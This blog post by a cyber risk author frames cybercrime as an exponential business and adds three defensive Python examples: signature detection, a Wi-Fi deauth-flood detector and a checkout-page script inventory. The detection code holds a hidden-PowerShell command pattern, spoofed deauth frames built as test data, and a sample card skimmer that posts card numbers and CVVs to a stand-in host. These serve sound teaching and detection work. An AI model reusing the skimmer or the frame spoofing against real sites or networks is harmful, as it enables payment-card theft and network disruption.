As anyone who has spent five minutes with me knows, I have written a book outlining some of the common challenges of cyber risk management. In the aforementioned foray into publishing, I touch on the ‘Six Ds of an exponential organisation’ – a definition brought to prominence by Peter Diamandis and latterly Salim Ismail. I am going to be honest, when I wrote the 6Ds in ‘Cyber Risk Management’, I did so to highlight the profound change in the characteristics of organisations in the 21st century. I thought it was important to highlight how technology has driven a way of working that has not been seen previously. In analysing the 6Ds of exponential organisations, I noticed how applicable these characteristics were to cybersecurity. So, rather than insist on an increased word count in the book, I thought it prudent to add my views to the ‘matters’ blog site!
Let’s explore how trends in cyber are tracking broader societal and enterprise trends. Applying Diamandis’ 6Ds to cybercrime shows that, as an industry, it clearly behaves as an exponential business. I am unsure whether we have yet reached the ‘knee of the curve’ (check out chapter 1), but there are figures which evidence significant growth across several salient categories.
Few could argue that crime has ‘gone digital’. In my MSc thesis, I wrote about the concept of e-crime: the denotation and delineation of crime from its electronic cousin. In 2019, such a separation of traditional crime from its digital or electronic variety simply isn’t necessary. The UK Information Commissioner made a similar point in an interview with The Guardian, asserting that ‘data crimes are real crimes’ (Cadwalladr, 2018), a statement in support of the fine imposed on Facebook for data misuse and its part in the Cambridge Analytica scandal. As we explored earlier in this chapter, we have crimes exacerbated by digital means (fraud, exploitation and so on), but these are crimes which have existed for millennia.
Cybercrime has, however, also become truly ‘digital’, and few would suggest otherwise. Could we imagine a crime such as denial of service occurring before these technological advancements? Cryptojacking, the covert mining of cryptocurrency on victims’ idle machine resources, is a case in point: an entirely new wave of crime, facilitated by computing, whose proceeds are a somewhat intangible, digital currency.
We also have crimes which were previously carried out in person but have since been ‘digitally enabled’. Few would call fraud a cybercrime, but few would dispute that fraud has become immeasurably easier with the introduction of email and the world wide web. Consider ATM card skimming. It used to be an activity carrying a high likelihood of detection, as physical ‘skimmers’ had to be fitted to the ATM. Our online world has created skimming 2.0, where an attacker achieves the same outcome without any physical hardware (Pauli, 2016): the attacker need only plant malicious code (typically a few lines of JavaScript) on a vulnerable e-commerce web server and wait for the card numbers to arrive at a server they control.
I think we would all agree that the exponential growth of cybercrime presents defenders with a visibility problem. The difference between linear and exponential growth is seemingly imperceptible until the ‘knee of the curve’ is reached. In a business context, failing to identify exponential growth could mean missing first-mover advantage or pursuing an ineffective, reactive business strategy. In a cybersecurity context, the result is a potential misrepresentation of the seriousness and prevalence of cyber threats.
Malware volumes continue to grow. The AV-Test Institute registers over 250,000 new malicious files every single day (AV-Test, 2018). The past ten years have evidenced exponential growth in the total volume of malware seen: from approximately 25 million samples in 2009 to 750 million (and counting) in 2018. Less perceptible is the increase between 2009 and 2012, to around 100 million: still exponential, but ostensibly manageable.
The deceptive growth of total malware volumes presents a considerable challenge for the defender. In 2009, with a (now paltry) 25 million malware samples, companies were (semi-)reliably using anti-virus solutions based almost exclusively on signatures. For those not familiar with AV parlance, think of a signature as a static identifier of a file: a checksum, in the form of a one-way hash function, computed over the file’s contents. The de facto algorithm was MD5, which produces a 128-bit (16-byte) hash. Change a single byte of the file and its hash changes completely.
The challenge with a signature-based prevention system is that the defender has to have seen that exact file before. In 2009, many enterprise security models were predicated on an ability to tell good from bad. We applied this to malware samples, DLP dictionaries and URL filtering rules, but the sheer volume of malware samples, phishing sites and exploit kits means that operations teams are overloaded and technical solutions are falling behind. Add polymorphism (malware that rewrites itself so that every copy has a different hash) and fast-flux DNS (command-and-control domains whose IP addresses change every few minutes) to the melting pot and our entire security model is broken. Signatures remain critically important as a mechanism to detect and respond to cyberattacks, but the dynamic nature of modern malware means that their use as a preventative control is increasingly ineffective.
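To make the signature problem concrete, here is an added example (my illustration, not code from the original post or from any AV vendor). The ‘sample’ is a constructed byte string standing in for a malicious file, not a real binary; the MD5 blocklist represents the 2009-style signature, and the byte-pattern rule represents a YARA-style content signature that keys on bytes the attacker has to keep for the malware to work.

```python
import hashlib

# Constructed stand-in for a malware sample: a fake header, padding and a
# command string the malware needs in order to run. Not a real binary.
ORIGINAL_SAMPLE = (
    b"MZ\x90\x00" + b"\x00" * 60
    + b"cmd.exe /c powershell -nop -w hidden -enc "
    + b"A" * 32 + b"\x00" * 16
)


def md5_signature(sample: bytes) -> str:
    """Classic AV signature: MD5 of the whole file (128 bits, 32 hex characters)."""
    return hashlib.md5(sample).hexdigest()


def mutate(sample: bytes, offset: int, new_byte: int) -> bytes:
    """Cheapest possible polymorphism: change one byte the code never depends on."""
    return sample[:offset] + bytes([new_byte]) + sample[offset + 1:]


def hash_blocklist_matches(sample: bytes, blocklist: set) -> bool:
    """Hash-based prevention only fires on files the defender has already seen."""
    return md5_signature(sample) in blocklist


def pattern_matches(sample: bytes, patterns: list) -> bool:
    """Content rule (YARA-style strings): fires on bytes the attacker has to keep."""
    return any(p in sample for p in patterns)


def compare_signature_styles() -> dict:
    """How each approach fares against the original sample and a one-byte variant."""
    blocklist = {md5_signature(ORIGINAL_SAMPLE)}
    patterns = [b"powershell -nop -w hidden -enc"]
    # Flip the final padding byte: behaviour is identical, the hash is not.
    variant = mutate(ORIGINAL_SAMPLE, len(ORIGINAL_SAMPLE) - 1, 0x01)
    return {
        "hashes_differ": md5_signature(variant) != md5_signature(ORIGINAL_SAMPLE),
        "hash_catches_original": hash_blocklist_matches(ORIGINAL_SAMPLE, blocklist),
        "hash_catches_variant": hash_blocklist_matches(variant, blocklist),
        "pattern_catches_original": pattern_matches(ORIGINAL_SAMPLE, patterns),
        "pattern_catches_variant": pattern_matches(variant, patterns),
    }


if __name__ == "__main__":
    for name, outcome in compare_signature_styles().items():
        print(f"{name:>26}: {outcome}")
```

The hash blocklist catches the original and misses the variant; the content rule catches both. The caveat is that content rules are also evadable (packing, string obfuscation), which is why behavioural detection and response, rather than a blocklist, carry the weight today.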
So, what is disruption? For me, it’s the creation of a new market and the displacement of existing players. The entire crime ecosystem has been transformed over the past ten years. Ismail (2014) speaks about ExOs (exponential organisations) having a Massive Transformative Purpose (MTP), which is intrinsically associated with a company’s ability to disrupt.
We have certainly experienced disruption in the cybercrime arena, and in very similar ways to more legitimate organisations. This ‘next generation of cybercrime’ is being carried out by highly organised, intelligent syndicates with a focus on customer service and quality. The service models which have disrupted the taxi, music and photographic industries are being leveraged for criminal purposes. The ‘as-a-service’ model we have seen adopted by leading companies in all verticals is being modified for nefarious purposes.
DDoS as a service, malware as a service and password cracking as a service are all available to those with a limited budget and a Tor client. In the same way that SaaS and IaaS solutions provide small and medium enterprises (SMEs) with carrier-grade infrastructure and security solutions, the ‘as a service’ cybercrime model gives the ‘petty criminal’ access to best-of-breed hacking tools and network stressing services.
The mobile phone has demonetised so many everyday items. Very few of us carry a flashlight, a compass and map, a video camera or a restaurant review guide; these are now services delivered through the modern mobile phone, digital versions of previously tangible items. The photo printing industry was entirely demonetised by digital photography and the nominal cost of file storage.
Cybercrime, well, crime per se, has not avoided demonetisation. We need look no further than one of the oldest threat events in the book: lock picking. In a traditional sense, lock picking has time and money implications. We have all seen the classic movies where the good guys and the bad can pick the locks of government research facilities, safety deposit boxes and apartment blocks. If we ignore the implausibly easy method of using a credit card, most lock-picking endeavours require a lock-picking kit, tension tools, extractors and a significant amount of trial and error. Surely we cannot demonetise lock picking, or so I thought.
IoT ushers in a new level of convenience. Until recently, one of the drawbacks of internet shopping was that someone had to be at home to receive your goods. Few things irritate the average human more than the little red postcard left by the Royal Mail to politely inform you that your ‘parcel can be collected from the depot’ as no one was home. You could write off the following Saturday morning queuing at the Post Office, followed by the anti-climax when you realise that what you thought would be your new golf clubs is, in fact, another pair of shoes your wife has ordered. The process was slow, time-consuming and costly (for all). Companies like Amazon realised that the model was broken and that it could be ‘fixed’ through technology.
Enter Amazon Key, a “Keyless Entry, Guest Access, and Optional In-Home Delivery” (Amazon, 2018) system. Amazon Key allows deliveries to be received without anyone being at home; what’s not to like? Amazon Key also provides a similar service for deliveries to your car. The benefits of a digitised lock and house access system are apparent although, as with most systems which provide convenience, something has to be conceded on the security front.
No sooner was Amazon Key on general release than researchers and hackers alike had uncovered vulnerabilities which demonetise the lock-picking business. A primary lock-picking drawback for the would-be criminal is locality: until now, picking a lock has required the attacker to be in proximity to the lock. The risk-versus-reward dichotomy is salient; picking a lock carries a high likelihood of being caught. In a world where locks and door entry are controlled through software and internet-connected devices, the criminal can open a victim’s front door with nothing more than a Raspberry Pi. At some point, going onsite is required for physical theft, but this is made immeasurably easier by an open door.
In late 2017, Amazon had to release an emergency security patch to the Key system after researchers at Rhino Security Labs demonstrated that flooding the local Wi-Fi network with ‘deauthentication’ frames knocks Amazon’s Cloud Cam (an integral component of the Key architecture) offline. This availability-based attack leaves the camera displaying only the last image it captured and prevents the door from locking.
Now, I have warned of the dangers of cyber-sensationalism. In the interests of practical security advice, we should remember that this attack was identified by a researcher; it was not an ‘in the wild’ attack. It also carries a short window of opportunity and a high likelihood of subsequent detection, given that jamming the signal requires a continuous stream of frames and that Amazon Key timestamps every opening and closing of the lock.
Amazon provided a software update expediently. The update alerts the user if the camera goes offline for any period. A barrage of warnings could prove annoying for the average user and reinforce a feeling of security apathy: Wi-Fi networks regularly drop connectivity, and being alerted on every occasion may leave users ignoring the actual incidents which require attention. Amazon’s formal company response served to placate consumer and media concerns.
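The researchers’ attack is, at the radio layer, just a flood of 802.11 deauthentication management frames, and that is detectable by anyone watching the airwaves. The following is an added example (mine, not code from the original post, from Rhino Security Labs or from Amazon) of the detection logic: it builds a constructed capture of 802.11 frames with made-up MAC addresses, picks out deauthentication frames by their Frame Control type/subtype, and flags any BSSID that sees an implausible number of them in a one-second window. The threshold is an assumption; a genuine roaming or disconnect event produces a handful of such frames, not fifty.

```python
import struct
from collections import defaultdict, deque

# 802.11 Frame Control byte 0: bits 0-1 protocol version, 2-3 type, 4-7 subtype.
FC_DEAUTH = 0xC0   # type 0 (management), subtype 12 (deauthentication)
FC_BEACON = 0x80   # type 0 (management), subtype 8 (beacon)
FC_DATA = 0x08     # type 2 (data), subtype 0

# Constructed MAC addresses; none belongs to a real device.
CAMERA = bytes.fromhex("02aa000000c1")
LAPTOP = bytes.fromhex("02dd000000c2")
ROUTER = bytes.fromhex("02bb000000a1")    # BSSID of the home network
OTHER_AP = bytes.fromhex("02cc000000a2")  # a neighbour's network, quiet
BROADCAST = b"\xff" * 6


def build_frame(fc_byte: int, dst: bytes, src: bytes, bssid: bytes, reason: int = 7) -> bytes:
    """Minimal 24-byte 802.11 MAC header plus a 2-byte reason code for deauth frames."""
    header = (struct.pack("<BBH", fc_byte, 0x00, 0x013A)  # Frame Control, Duration
              + dst + src + bssid
              + struct.pack("<H", 0))                      # Sequence Control
    body = struct.pack("<H", reason) if fc_byte == FC_DEAUTH else b""
    return header + body


def is_deauth(frame: bytes) -> bool:
    if len(frame) < 26:
        return False
    fc0 = frame[0]
    version, ftype, subtype = fc0 & 0x03, (fc0 >> 2) & 0x03, (fc0 >> 4) & 0x0F
    return version == 0 and ftype == 0 and subtype == 12


def peak_deauth_rate(captures, window_s: float = 1.0) -> dict:
    """Per BSSID, the most deauth frames seen in any window_s-second sliding window.
    captures: iterable of (timestamp_seconds, frame_bytes)."""
    recent = defaultdict(deque)
    peak = defaultdict(int)
    for ts, frame in sorted(captures, key=lambda c: c[0]):
        if not is_deauth(frame):
            continue
        bssid = frame[16:22].hex()
        q = recent[bssid]
        q.append(ts)
        while q and ts - q[0] > window_s:
            q.popleft()
        peak[bssid] = max(peak[bssid], len(q))
    return dict(peak)


def flooded_bssids(captures, window_s: float = 1.0, threshold: int = 10) -> list:
    """BSSIDs whose deauth rate exceeds what a normal disconnect would produce."""
    return sorted(b for b, n in peak_deauth_rate(captures, window_s).items() if n >= threshold)


def constructed_capture() -> list:
    """Beacons and data on two networks, one benign deauth, then a 0.5 s burst of
    spoofed deauths aimed at the camera on the home network."""
    frames = []
    for i in range(20):
        frames.append((i * 0.5, build_frame(FC_BEACON, BROADCAST, ROUTER, ROUTER)))
        frames.append((i * 0.5 + 0.1, build_frame(FC_BEACON, BROADCAST, OTHER_AP, OTHER_AP)))
        frames.append((i * 0.5 + 0.2, build_frame(FC_DATA, ROUTER, CAMERA, ROUTER)))
    frames.append((3.0, build_frame(FC_DEAUTH, LAPTOP, OTHER_AP, OTHER_AP, reason=3)))
    for i in range(50):  # attacker spoofs the router's address as the source
        frames.append((6.0 + i * 0.01, build_frame(FC_DEAUTH, CAMERA, ROUTER, ROUTER)))
    return frames


if __name__ == "__main__":
    cap = constructed_capture()
    print("peak deauths per second:", peak_deauth_rate(cap))
    print("flooded BSSIDs:", flooded_bssids(cap))
```

Note the difference from Amazon’s fix: this alerts on the attack itself rather than on the camera going offline, so an ordinary Wi-Fi dropout produces no alert and the alert-fatigue problem described above does not arise. A monitor-mode capture is needed to see management frames at all, which is why this kind of detection lives in a wireless IDS rather than in a consumer camera.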
The Amazon Key example illustrates several concepts which we will explore across future chapters:
- Technological advancements which rely on software and computer networking provide new and demonetised methods of carrying out criminal activity.
- Vulnerabilities in software will always be discovered – expediency of security updates is critical.
- Incendiary media headlines, once contextualised, often actually cover a more mundane vulnerability with compensating or mitigating controls.
I have written previously about the challenges of card skimming in a digital world. Cloning physical credit cards requires proximity to the cards and manual processes. Thieves are shifting to another form of demonetisation: obtaining card records by injecting card-skimming code into e-commerce sites via vulnerable plugins. The opportunities for demonetisation in cybercrime are seemingly infinite.
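Because the injected skimmer runs in the shopper’s browser, the defender’s check is to know exactly which scripts the checkout page is supposed to execute and to alarm on anything else. The following is an added example (my code, not from the original post, from any retailer or from a named skimming campaign) of that check: it inventories the external script URLs and hashes the inline script bodies of a constructed checkout page, then diffs a compromised copy of that page against the approved baseline. The domains are reserved example names and the injected snippet is a constructed illustration of the form-hooking pattern the text describes; the `sri_integrity` helper produces the value you would put in a `<script integrity="...">` attribute so the browser refuses a modified external script.

```python
import base64
import hashlib
from html.parser import HTMLParser


class ScriptExtractor(HTMLParser):
    """Collect external script URLs and the bodies of inline scripts from a page."""

    def __init__(self):
        super().__init__()
        self.external = []
        self.inline = []
        self._capturing = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._capturing, self._buf = True, []

    def handle_data(self, data):
        if self._capturing:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._capturing:
            self.inline.append("".join(self._buf).strip())
            self._capturing = False


def inventory(page: str) -> dict:
    """Fingerprint of everything the page would execute: URLs plus SHA-256 of inline bodies."""
    p = ScriptExtractor()
    p.feed(page)
    p.close()
    return {
        "external": sorted(set(p.external)),
        "inline": {hashlib.sha256(b.encode()).hexdigest(): b for b in p.inline},
    }


def sri_integrity(body: bytes) -> str:
    """Subresource Integrity value (sha256 form) for a <script integrity="..."> attribute."""
    return "sha256-" + base64.b64encode(hashlib.sha256(body).digest()).decode()


def unexpected_scripts(page: str, baseline: dict) -> dict:
    """Scripts present on the page that were not in the approved baseline inventory."""
    now = inventory(page)
    return {
        "new_external": [u for u in now["external"] if u not in baseline["external"]],
        "new_inline": [body for h, body in now["inline"].items() if h not in baseline["inline"]],
    }


# Constructed checkout page; example.com and example.net are reserved names, not real sites.
BASELINE_PAGE = """<html><body>
<form id="pay" action="/charge" method="post">
  <input name="card" autocomplete="cc-number"><input name="cvv"></form>
<script src="https://cdn.example.com/checkout.js"></script>
<script>document.getElementById('pay').addEventListener('submit', validate);</script>
</body></html>"""

# The same page after a plugin compromise: one extra inline script copies the card
# fields to a third-party host when the form is submitted (constructed illustration).
COMPROMISED_PAGE = BASELINE_PAGE.replace("</body>", """<script>
document.getElementById('pay').addEventListener('submit', function () {
  var f = this; new Image().src = 'https://stats.example.net/c?d=' +
    encodeURIComponent(f.card.value + '|' + f.cvv.value);
});</script>
</body>""")


if __name__ == "__main__":
    approved = inventory(BASELINE_PAGE)
    print("approved external scripts:", approved["external"])
    print("SRI for approved inline handler:",
          sri_integrity(list(approved["inline"].values())[0].encode()))
    print("findings on compromised page:", unexpected_scripts(COMPROMISED_PAGE, approved))
```

Run against a live site, the baseline is taken from a known-good deployment and the diff runs on a schedule; a Content-Security-Policy that restricts `script-src` and `connect-src` to the approved origins is the complementary preventive control, because it stops the browser from sending the card data anywhere the policy does not name.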
The Shadow Brokers is a hacker group who rose to infamy in mid-2016 with a tweet from the @shadowbrokerss Twitter account. The succinct message advertised a Pastebin page offering a smorgasbord of hacking tools to the highest bidder. The leak was a treasure trove of malware tools and zero-day exploits stolen from the Equation Group, purportedly a sub-group of the NSA’s Tailored Access Operations (TAO) unit.
In April 2017, The Shadow Brokers adapted their business model: they made their leaks free to the general public. A true democratisation of software. Suddenly, anyone with an internet connection had access to some of the most potent cyber exploits available today. This action, and many like it (the Mirai botnet source code was uploaded online), seismically moved the goalposts of cyber defence. Over the years, many a CISO has uttered the words ‘we do not need to worry about all these nation-state actors, we have nothing that they want to steal’. Historically, this reasoning made sense. Why would a small retail outlet with an e-commerce platform need to employ controls to protect itself from state espionage and hacking? The cost of such controls was too high and the likelihood of being targeted too low. Well, put the tools of a nation-state in the hands of everyone and, overnight, ‘sophisticated and state-sponsored’ becomes convenient and cost-effective. We have a situation where the less skilled can simply repackage existing exploits. We are seeing the democratisation and commoditisation of cyber-weapons.
Automation and commoditisation aren’t the exclusive reserve of nation-state exploits being released. Stress testing tools for DDoS, malware-as-a-service and dark-web sales of user credentials and payment cards show that information and tools are available at a price point appealing to the masses. I remember a keynote I gave at a conference in Dublin, Ireland. The focus of the session was the criminal infrastructure and supporting services associated with crypto-ransomware. I provided examples of malware democratisation. As an example, in 2013 it would cost would-be criminals thousands of dollars to acquire CryptoLocker ransomware; by late 2016 it was possible to pick up ‘Stampado’ malware for $40. Wow! If you’re thinking of getting into the profession of the cybercriminal, you might think twice about shelling out thousands of dollars, but at $40 what does the would-be criminal have to lose? Organised criminals took advantage of a service-based model and provided services to the masses through the same technologies which have provided commercial benefits to legitimate businesses.
In early 2018, while perusing GitHub, I remember coming across the epitome of democratisation: the aggregation of several already-democratised services, exemplifying the point-and-click nature of the tools which script-kiddies use to wreak havoc on an ill-equipped, under-prepared enterprise. The tool in question was AutoSploit and, as the author puts it, “AutoSploit attempts to automate the exploitation of remote hosts” (GitHub, 2018). It does this through Python scripting which takes the output of Shodan queries and provides it as input to Metasploit. The specifics of these tools are not within the scope of this book, but AutoSploit took two already relatively automated tools which required little technical expertise and made them trivial to operate. I assert that we will continue to see an increase in automated hacking tools. This is where a fine line exists between tools which are for the good of our industry and democratised hacking vehicles. Shodan, Metasploit and AutoSploit were all created with the noble goal of making our industry safer, by cybersecurity professionals, for cybersecurity professionals; yet the same tools which can be used for good can be repurposed in a heartbeat and used for nefarious actions.
In closing, think about cybercrime as a business. Those who are successful run businesses which share the characteristics of other prominent and successful organisations: agile, structured and resilient. We must design defences for the threat events of today and better understand the tactics, techniques and procedures (TTPs) of the modern cybercriminal.